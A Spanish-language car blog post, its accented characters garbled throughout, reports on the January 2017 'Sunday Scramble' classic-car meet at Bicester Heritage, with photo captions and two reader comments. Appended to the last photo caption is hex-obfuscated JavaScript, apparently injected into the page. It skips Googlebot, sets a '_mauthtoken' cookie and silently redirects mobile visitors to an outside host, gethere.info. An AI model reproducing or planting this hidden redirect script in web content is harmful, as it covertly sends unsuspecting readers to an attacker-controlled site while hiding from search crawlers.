Bicester Heritage le abriA? sus puertas al 2017

vadeRetro
Scramble_Jan_17_slider
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

Scramble_Jan_17_059

Los populares “Sunday Scramble” que a lo largo de todo el aA�o son convocados en Bicester Heritage tuvieron su primera fecha de este 2017 en el segundo domingo del aA�o y, como era de esperarse, miles de entusiastas, mA?s de 2.500 para ser mA?s precisos, se acercaron a pesar un buen rato en esta comunidad hermanada por los automA?viles clA?sicos.

MA?s de 1.000 autos pertenecientes a los emprendimientos que ya se han instalado en esta antigua base de la Royal Air Force, y a algunos de los visitantes, se alinearon a lo largo de los 348 acres de superficie de este sitio histA?rico ubicado en el corazA?n de inglaterra, exhibidos junto a motos y tambiA�n algunos aviones histA?ricos.

Scramble_Jan_17_039

Scramble_Jan_17_047

Entre los autos mA?s notables que pudieron disfrutar los visitantes estuvieron un grupo de Bentley 4.5 litros, algunos Vauxhall 30-98 y un Aston Martin Ulster con un notable pedigrA� de carreras. Entre los superdeportivos modernos los que llamaron mayormente la atenciA?n fueron tres Ferrari F12 TDF, dos ejemplares de McLaren 675LT, el Vanquish S y un DB11 de Aston Martin.

Este primer “alboroto dominical” del aA�o le dio a los visitantes la oportunidad de ver algunos de los edificios aun sin restaurar de la base de Bicester antes de que Bicester Heritage comience la cuarta fase del proyecto que estipula dejar operativas todas esas instalaciones, que contemplan casi 3.000 metros cuadrados de nuevos talleres, oficinas y estudios de ingenierA�a. AdemA?s, en esta misma fase tambiA�n existe un proyecto de instalaciA?n de un hotel. Como para quedarse ahA� a vivira��

Fotos: Amy Shore

Scramble_Jan_17_034

Scramble_Jan_17_044

Scramble_Jan_17_057

Scramble_Jan_17_032

Scramble_Jan_17_061

Scramble_Jan_17_063

Scramble_Jan_17_065

Scramble_Jan_17_080

Scramble_Jan_17_119

Scramble_Jan_17_091

Scramble_Jan_17_124

Scramble_Jan_17_128

Scramble_Jan_17_130

Scramble_Jan_17_163

Scramble_Jan_17_189

Scramble_Jan_17_179

Scramble_Jan_17_214

Scramble_Jan_17_224

Scramble_Jan_17_249

Scramble_Jan_17_233

Scramble_Jan_17_246

Scramble_Jan_17_239var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

2 Comentarios, RSS

  1. Javier M 05/02/2017 @ 1:23 am

    Seleccion de 4×4: Bedford Green Goddess, que alguna recalo en esta banda del rio y lo primero que hicieron fue sacarles la bomba auxiliar que esta movida por un lindo motor Coventry Climax.
    Austin Champ, Land Rover SI 86 pulgadas y L. Rover SIIB 110 Forward Control.

  2. Beppe Viola 05/02/2017 @ 9:01 am

    Solo los ingleses saben hacer este tipo de cosas,…. unir la historia y la tradición, automóviles y aviones, garua y cielos grises, viejos edificios y descapotables, resumiendo todo en la palabra “Heritage”
    well done….

Tu email no será publicado. Required fields are marked *

*


*

oldsmobile_442_1972_images_2_b

Este número no representa el esquema táctico de Sabella para el partido con Irán,... Seguir Leyendo >>

27